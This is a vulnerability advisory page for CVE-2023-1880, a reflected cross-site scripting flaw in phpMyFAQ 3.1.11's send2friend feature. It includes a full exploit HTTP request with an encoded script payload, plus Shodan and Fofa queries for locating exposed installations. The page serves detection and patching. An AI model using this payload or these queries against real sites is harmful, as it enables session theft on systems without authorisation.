🔙 목록으로 돌아가기

CVE-2023-1880: Phpmyfaq v3.1.11 - Cross-Site Scripting

TitlePhpmyfaq v3.1.11 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactUnauthenticated attackers can inject malicious JavaScript through the unsanitized artlang parameter in send2friend functionality to steal user session cookies.
RemediationFixed in 3.1.12 Version.
CVSS Score6.1
EPSS Score0.3857
CVE IDCVE-2023-1880
CWE IDCWE-79
Shodan Queryhttp.html:"phpmyfaq"
Fofa Querybody="phpmyfaq"
Tags cve2023 cve huntr xss phpmyfaq vuln

🔍 Vulnerability Description

Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the ‘artlang’ parameter is not sanitized.

🌐 HTTP Request

GET /?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1880.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-1880.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A